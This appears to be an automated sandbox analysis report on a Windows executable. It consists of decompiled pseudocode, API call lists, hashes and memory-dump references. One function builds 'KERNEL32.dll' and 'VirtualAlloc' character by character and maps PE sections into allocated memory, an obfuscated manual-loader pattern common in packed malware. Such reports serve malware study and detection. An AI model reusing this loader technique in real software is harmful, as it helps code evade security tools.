u, xrefs: 0045BDB6
l, xrefs: 0045BE50
a, xrefs: 0045BE1B

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$AddressHandleModuleProc
String ID: A$A$G$H$H$KERNEL32.dll$KERNEL32.dll$Main$Main$P$V$VirtualAlloc$a$a$a$c$c$c$e$e$e$e$i$l$l$l$l$l$o$o$o$p$p$r$r$s$s$t$t$u
API String ID: 2994196730-12738437
Opcode ID: d2ea042641b0d28da5f9d7895672fc1727b8f8b35758acbad4d21e71866a9d81
Instruction ID: 6e07818d61c326b52828e8a590f93f1ad9cfa648c3b3d6220b1b368cdc7f6c02
Opcode Fuzzy Hash: d2ea042641b0d28da5f9d7895672fc1727b8f8b35758acbad4d21e71866a9d81
Instruction Fuzzy Hash: 79814471D08288EEEB11CBA8C884BDEBFF59F15709F084099E940B6292C7BE5549C779

Uniqueness

Uniqueness Score: -1.00%

Function 0045BAB0, Relevance: 54.3, APIs: 4, Strings: 27, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
GetProcAddress.KERNEL32(00000000), ref: 0045BB38
GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48
GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

Strings

., xrefs: 0045BAEF
a, xrefs: 0045BB07
LoadLibr, xrefs: 0045BAC6, 0045BACA
i, xrefs: 0045BB13
l, xrefs: 0045BAF7
y, xrefs: 0045BB27
K, xrefs: 0045BACE
d, xrefs: 0045BAF3
l, xrefs: 0045BAFB
E, xrefs: 0045BAD3
a, xrefs: 0045BB1F
L, xrefs: 0045BAE3
N, xrefs: 0045BADB
L, xrefs: 0045BB0F
Libr, xrefs: 0045BB4C
b, xrefs: 0045BB17
L, xrefs: 0045BAFF
A, xrefs: 0045BB2B
r, xrefs: 0045BB23
R, xrefs: 0045BAD7
r, xrefs: 0045BB1B
d, xrefs: 0045BB0B
3, xrefs: 0045BAE7
E, xrefs: 0045BADF
o, xrefs: 0045BB03
2, xrefs: 0045BAEB
LoadLibr, xrefs: 0045BB42

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: .$2$3$A$E$E$K$L$L$L$Libr$LoadLibr$LoadLibr$N$R$a$a$b$d$d$i$l$l$o$r$r$y
API String ID: 1646373207-713136220
Opcode ID: ab11df402e6262a6cd0bd32f4206eccbc3d47516eb2c55da4dfc699759f1ff03
Instruction ID: 5a3198b695a9dee0d5a40146d2940be610bb7fc64b86859fd665e7280c72d510
Opcode Fuzzy Hash: ab11df402e6262a6cd0bd32f4206eccbc3d47516eb2c55da4dfc699759f1ff03
Instruction Fuzzy Hash: F721F050D082CDE9EF0296A8C8087EEBFA55F12348F084099D68466293C3FE5658C7BA

Uniqueness

Uniqueness Score: -1.00%

Function 0045F88E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0045F88E(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, char _a32) {
				signed int _v8;
				intOrPtr _v20;
				short* _v28;
				int _v32;
				short* _v36;
				short* _v40;
				int _v44;
				void* _v60;
				int _t61;
				int _t62;
				int _t82;
				int _t83;
				int _t84;
				int _t88;
				short* _t89;
				int _t90;
				void* _t91;
				int _t99;
				intOrPtr _t101;
				short* _t102;
				int _t104;

				_push(0xffffffff);
				_push(0x45b928);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t101;
				_t102 = _t101 - 0x1c;
				_v28 = _t102;
				_t104 =  *0x460884; // 0x1
				if(_t104 != 0) {
					L5:
					if(_a16 > 0) {
						_t83 = E0045FAB2(_a12, _a16);
						_pop(_t91);
						_a16 = _t83;
					}
					_t61 =  *0x460884; // 0x1
					if(_t61 != 2) {
						if(_t61 != 1) {
							goto L21;
						} else {
							if(_a28 == 0) {
								_t82 =  *0x46087c; // 0x0
								_a28 = _t82;
							}
							_t16 =  &_a32; // 0x4609e4
							asm("sbb eax, eax");
							_t88 = MultiByteToWideChar(_a28, ( ~( *_t16) & 0x00000008) + 1, _a12, _a16, 0, 0);
							_v32 = _t88;
							if(_t88 == 0) {
								goto L21;
							} else {
								_v8 = 0;
								E0045E860(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
								_v28 = _t102;
								_v40 = _t102;
								_v8 = _v8 | 0xffffffff;
								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
									goto L21;
								} else {
									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
									_v44 = _t99;
									if(_t99 == 0) {
										goto L21;
									} else {
										if((_a9 & 0x00000004) == 0) {
											_v8 = 1;
											E0045E860(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
											_v28 = _t102;
											_t89 = _t102;
											_v36 = _t89;
											_v8 = _v8 | 0xffffffff;
											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
												goto L21;
											} else {
												_push(0);
												_push(0);
												if(_a24 != 0) {
													_push(_a24);
													_push(_a20);
												} else {
													_push(0);
													_push(0);
												}
												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
												if(_t99 == 0) {
													goto L21;
												} else {
													goto L30;
												}
											}
										} else {
											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
												L30:
												_t62 = _t99;
											} else {
												goto L21;
											}
										}
									}
								}
							}
						}
					} else {
						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
					}
				} else {
					_push(0);
					_push(0);
					_t90 = 1;
					_t84 = LCMapStringW(0, 0x100, 0x45b920, _t90, ??, ??); // executed
					if(_t84 == 0) {
						if(LCMapStringA(0, 0x100, 0x45b91c, _t90, 0, 0) == 0) {
							L21:
							_t62 = 0;
						} else {
							 *0x460884 = 2;
							goto L5;
						}
					} else {
						 *0x460884 = _t90;
						goto L5;
					}
				}
				 *[fs:0x0] = _v20;
				return _t62;
			}

APIs

LCMapStringW.KERNEL32(00000000,00000100,0045B920,00000001,00000000,00000000,751470F0,004609E4,?,?,?,0045FD02,?,?,?,00000000), ref: 0045F8D0
LCMapStringA.KERNEL32(00000000,00000100,0045B91C,00000001,00000000,00000000,?,?,0045FD02,?,?,?,00000000,00000001), ref: 0045F8EC
LCMapStringA.KERNEL32(?,?,?,0045FD02,?,?,751470F0,004609E4,?,?,?,0045FD02,?,?,?,00000000), ref: 0045F935
MultiByteToWideChar.KERNEL32(?,F,?,0045FD02,00000000,00000000,751470F0,004609E4,?,?,?,0045FD02,?,?,?,00000000), ref: 0045F96D
MultiByteToWideChar.KERNEL32(00000000,00000001,?,0045FD02,?,00000000,?,?,0045FD02,?), ref: 0045F9C5
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0045FD02,?), ref: 0045F9DB
LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,0045FD02,?), ref: 0045FA0E
LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,0045FD02,?), ref: 0045FA76

Strings

F, xrefs: 0045F95E, 0045F969

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: F
API String ID: 352835431-2857159536
Opcode ID: 0fdf792a8dbf3ef76d00b361eb834d0e93e90a8af3c6985fc279465cdd2f0fb4
Instruction ID: 35e26f69cad8784389b82d866ada14d1759a34fbd47d2f3d5bfdde2c89a22c03
Opcode Fuzzy Hash: 0fdf792a8dbf3ef76d00b361eb834d0e93e90a8af3c6985fc279465cdd2f0fb4
Instruction Fuzzy Hash: 8751AB71800248ABCF219F54DC44EEF7FB9FB48751F10412AFC04A2262D3398D58DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0045C790, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 75%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				unsigned int _t15;
				void* _t17;
				signed int _t27;
				intOrPtr _t29;
				signed int _t35;
				void* _t38;
				intOrPtr _t50;

				_t45 = __edi;
				_push(0xffffffff);
				_push(0x45b568);
				_push(E0045D560);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_push(__edi);
				_v28 = _t50 - 0x58;
				_t15 = GetVersion();
				 *0x4606ac = 0;
				_t35 = _t15 & 0x000000ff;
				 *0x4606a8 = _t35;
				 *0x4606a4 = _t35 << 8;
				 *0x4606a0 = _t15 >> 0x10;
				_t17 = E0045D408(_t35 << 8, 1);
				_pop(_t38);
				if(_t17 == 0) {
					E0045C8BD(0x1c);
					_pop(_t38);
				}
				if(E0045D1C5() == 0) {
					E0045C8BD(0x10);
					_pop(_t38);
				}
				_v8 = 0;
				E0045D009();
				 *0x460d58 = GetCommandLineA();
				 *0x460690 = E0045CED7(); // executed
				E0045CC8A(); // executed
				E0045CBD1();
				E0045C8E1();
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_v104 = E0045CB79();
				_t54 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t27 = 0xa;
				} else {
					_t27 = _v96.wShowWindow & 0x0000ffff;
				}
				_t29 = E0045C73E(_t38, _t54, GetModuleHandleA(0), 0, _v104, _t27); // executed
				_v100 = _t29;
				E0045C90E(_t29);
				_v108 =  *((intOrPtr*)( *_v24));
				return E0045CA01(_t45, _t54,  *((intOrPtr*)( *_v24)), _v24);
			}

APIs

GetVersion.KERNEL32 ref: 0045C7B6

Part of subcall function 0045D408: HeapCreate.KERNEL32(00000000,00001000,00000000,0045C7EE,00000001), ref: 0045D419
Part of subcall function 0045D408: HeapDestroy.KERNEL32 ref: 0045D458

GetCommandLineA.KERNEL32 ref: 0045C816
GetStartupInfoA.KERNEL32(?), ref: 0045C841
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0045C864

Part of subcall function 0045C8BD: ExitProcess.KERNEL32 ref: 0045C8DA

Strings

H4f, xrefs: 0045C81C

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
String ID: H4f
API String ID: 2057626494-2654155504
Opcode ID: 8bba840476d63f0bb722fd5c288938af137cc4d34447c4d606bfe545a1ca87a5
Instruction ID: c35b9dc727815e3def391897aa1f97c403b1516358bbf2be7613d25110c55fcc
Opcode Fuzzy Hash: 8bba840476d63f0bb722fd5c288938af137cc4d34447c4d606bfe545a1ca87a5
Instruction Fuzzy Hash: 2C2196B1C40745AED714BFB5DC86B6E7BA4EF4470AF10012FFD05AA2A2EB7C4444CA59

Uniqueness

Uniqueness Score: -1.00%

Function 0045DAF8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0045DAF8(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x460a04,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0045FADD(1,  &_v280, 0x100,  &_v1304,  *0x460a04,  *0x460c24, 0);
						E0045F88E( *0x460c24, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x460a04, 0); // executed
						E0045F88E( *0x460c24, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x460a04, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x460a20) =  *(_t55 + 0x460a20) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x460b21) =  *(_t55 + 0x460b21) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x460a20) = _t77;
								goto L16;
							}
							 *(_t55 + 0x460b21) =  *(_t55 + 0x460b21) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x460a20) =  *(_t43 + 0x460a20) & 0x00000000;
						} else {
							 *(_t43 + 0x460b21) =  *(_t43 + 0x460b21) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x460b21) =  *(_t43 + 0x460b21) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x460a20) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 0045DB0C

Strings

, xrefs: 0045DB31
, xrefs: 0045DB55

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 69de5b47aadb92f9f508bab88a8ed90dda89733b40a769759e6c80d08f1e8234
Instruction ID: 0876d90852c3602ac0a29efc31e4673bd44d66622a0d054ccb3ed39e8ffa3651
Opcode Fuzzy Hash: 69de5b47aadb92f9f508bab88a8ed90dda89733b40a769759e6c80d08f1e8234
Instruction Fuzzy Hash: 8F4169318042981AEB368794CD4AFFB3FA99F16745F1804E6D986C7153D2B9490CC7AF

Uniqueness

Uniqueness Score: -1.00%

Function 0045BF74, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 107
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0045BF74(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int* _a12) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed char _v36;
				char _v37;
				char _v38;
				char _v39;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				void* __ebx;
				intOrPtr _t62;
				signed int _t64;
				long _t65;
				void* _t68;
				void* _t70;
				void* _t79;
				void* _t80;
				signed int* _t81;
				signed int _t84;
				signed int _t85;
				signed int _t90;
				signed int _t91;
				void* _t98;
				long _t106;
				void* _t107;
				signed int* _t110;
				void* _t112;
				void* _t113;
				void* _t114;

				_v36 = _v36 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push( &_v32);
				_push( &_v48);
				_push(0);
				_v48 = 0x4b;
				_v47 = 0x45;
				_v46 = 0x52;
				_v45 = 0x4e;
				_v44 = 0x45;
				_v43 = 0x4c;
				_v42 = 0x33;
				_v41 = 0x32;
				_v40 = 0x2e;
				_v39 = 0x64;
				_v38 = 0x6c;
				_v37 = 0x6c;
				_v32 = 0x56;
				_v31 = 0x69;
				_v30 = 0x72;
				_v29 = 0x74;
				_v28 = 0x75;
				_v27 = 0x61;
				_v26 = 0x6c;
				_v25 = 0x41;
				_v24 = 0x6c;
				_v23 = 0x6c;
				_v22 = 0x6f;
				_v21 = 0x63;
				_t62 = E0045BAB0( &_v48, _t79, __ecx, __edx);
				_t110 = _a12;
				_v16 = _t62;
				_t114 = _t113 + 0xc;
				_v8 = 0;
				_v12 = _t110[1];
				_t64 =  *_t110;
				_t80 = ( *(_t64 + 0x14) & 0x0000ffff) + _t64 + 0x18;
				if( *((intOrPtr*)(_t64 + 6)) <= 0) {
					L7:
					return _t64;
				}
				_t81 = _t80 + 0x10;
				do {
					_t65 =  *_t81;
					if(_t65 != 0) {
						_t68 = VirtualAlloc( *((intOrPtr*)(_t81 - 4)) + _v12, _t65, 0x1000, 4);
						_t84 =  *_t81;
						_t112 = _t81[1] + _a4;
						_t85 = _t84 >> 2;
						memcpy(_t68, _t112, _t85 << 2);
						_t70 = memcpy(_t112 + _t85 + _t85, _t112, _t84 & 0x00000003);
						_t114 = _t114 + 0x18;
						_t110 = _a12;
						 *(_t81 - 8) = _t70;
					} else {
						_t106 =  *(_a8 + 0x38);
						if(_t106 > 0) {
							_t98 = VirtualAlloc( *((intOrPtr*)(_t81 - 4)) + _v12, _t106, 0x1000, 4);
							_t90 = _t106;
							 *(_t81 - 8) = _t98;
							_t107 = _t98;
							_t91 = _t90 >> 2;
							memset(_t107 + _t91, memset(_t107, 0, _t91 << 2), (_t90 & 0x00000003) << 0);
							_t114 = _t114 + 0x18;
						}
					}
					_v8 = _v8 + 1;
					_t81 =  &(_t81[0xa]);
					_t64 =  *( *_t110 + 6) & 0x0000ffff;
				} while (_v8 < _t64);
				goto L7;
			}

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 0045C03D
VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,?), ref: 0045C06A

Strings

Main, xrefs: 0045BF74

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressAllocProcVirtual$HandleModule
String ID: Main
API String ID: 2267228844-521822810
Opcode ID: cee62c2c2e02034db9a7d3d6f0dd992017c7a7937f367cdb5946251bef5349b9
Instruction ID: 03b62afb07a4c919e2b5a817bf778c64180b78aaff5c588aeeabfdf7c33ac801
Opcode Fuzzy Hash: cee62c2c2e02034db9a7d3d6f0dd992017c7a7937f367cdb5946251bef5349b9
Instruction Fuzzy Hash: 1B416271D04288DFDB01CBA8C844BDEBFF59F55704F084099D985AB382C2BA5A48C779

Uniqueness

Uniqueness Score: -1.00%

Function 0045C2A7, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 151libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?), ref: 0045C3B7

Strings

Main, xrefs: 0045C2A7

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$LibraryLoad
String ID: Main
API String ID: 652391981-521822810
Opcode ID: 887ac467eb959279b67e7f1ac55f925f09e39beaa80884ea0b091b0adadd2156
Instruction ID: 4c0b1b4a5ee7a171aba18442f4929378021884909cb168b755187609daf839b2
Opcode Fuzzy Hash: 887ac467eb959279b67e7f1ac55f925f09e39beaa80884ea0b091b0adadd2156
Instruction Fuzzy Hash: 31616771D04389DEEB11CBA8C884BEEBFB59F16309F184059D94467383D3BD9948C769

Uniqueness

Uniqueness Score: -1.00%

Function 0045C0A1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(?,004010F0,00000000,00000000), ref: 0045BB2F
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000), ref: 0045BB38
Part of subcall function 0045BAB0: GetProcAddress.KERNEL32(00000000,?), ref: 0045BB48

Part of subcall function 0045BAB0: GetModuleHandleA.KERNEL32(Libr), ref: 0045BB4F

VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0045C207

Strings

Main, xrefs: 0045C0A1

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$ProtectVirtual
String ID: Main
API String ID: 2080333215-521822810
Opcode ID: be09265672eb639aabd4b649aec86dd7eae804ef470becd1e19f6645127e6a01
Instruction ID: 7eb39d379d8dda8edb999b5c720ddd1c7283f5280955887a184358df73ad0430
Opcode Fuzzy Hash: be09265672eb639aabd4b649aec86dd7eae804ef470becd1e19f6645127e6a01
Instruction Fuzzy Hash: 22512E70D082C8EEDB11CBA8D5887DEBFB56F16309F184099E5847B293C3BA5A09C775

Uniqueness

Uniqueness Score: -1.00%

Function 0045D408, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D408(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x460c28 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E0045D2C0(_t12, _t15);
					 *0x460c2c = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E0045F0E0();
							goto L5;
						}
					} else {
						_t10 = E0045E88F(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x460c28);
							goto L7;
						}
					}
				}
			}

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,0045C7EE,00000001), ref: 0045D419

Part of subcall function 0045D2C0: GetVersionExA.KERNEL32 ref: 0045D2DF

HeapDestroy.KERNEL32 ref: 0045D458

Part of subcall function 0045E88F: HeapAlloc.KERNEL32(00000000,00000140,0045D441,000003F8), ref: 0045E89C

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 500fa4b79c5aa03b79c95304531ca3db68015c8272760933812e88df128f1e66
Instruction ID: e1b9a8abd10e8304148c4a043e4ac180e090accbc4195e0a94eec1e10f6fb794
Opcode Fuzzy Hash: 500fa4b79c5aa03b79c95304531ca3db68015c8272760933812e88df128f1e66
Instruction Fuzzy Hash: 70F03971A05201AAEF342B315D45B2A25909F45797F10883BFD01D96A3FBB895C8DA1F

Uniqueness

Uniqueness Score: -1.00%

Function 0045D8A5, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0045D8A5(int _a4) {
				signed int _v8;
				char _v21;
				char _v22;
				struct _cpinfo _v28;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				signed int _t40;
				signed int _t41;
				int _t43;
				signed int _t47;
				signed int _t49;
				int _t50;
				signed char* _t51;
				signed int _t55;
				signed char* _t57;
				signed int _t60;
				intOrPtr* _t63;
				signed int _t65;
				signed char _t66;
				signed char _t68;
				signed char _t69;
				signed int _t70;
				void* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				void* _t85;

				E0045D7ED(0x19);
				_t50 = E0045DA52(_a4);
				_t85 = _t50 -  *0x460a04; // 0x4e4
				_a4 = _t50;
				if(_t85 != 0) {
					__eflags = _t50;
					if(_t50 == 0) {
						L30:
						E0045DACF(); // executed
					} else {
						_t65 = 0;
						__eflags = 0;
						_t36 = 0x458d80;
						while(1) {
							__eflags =  *_t36 - _t50;
							if( *_t36 == _t50) {
								break;
							}
							_t36 = _t36 + 0x30;
							_t65 = _t65 + 1;
							__eflags = _t36 - 0x458e70;
							if(_t36 < 0x458e70) {
								continue;
							} else {
								_t43 = GetCPInfo(_t50,  &_v28);
								_t81 = 1;
								__eflags = _t43 - _t81;
								if(_t43 != _t81) {
									__eflags =  *0x460850;
									if( *0x460850 == 0) {
										_t77 = _t81 | 0xffffffff;
										__eflags = _t77;
									} else {
										goto L30;
									}
								} else {
									 *0x460c24 =  *0x460c24 & 0x00000000;
									_t60 = 0x40;
									__eflags = _v28 - _t81;
									memset(0x460b20, 0, _t60 << 2);
									asm("stosb");
									 *0x460a04 = _t50;
									if(__eflags <= 0) {
										 *0x460a1c =  *0x460a1c & 0x00000000;
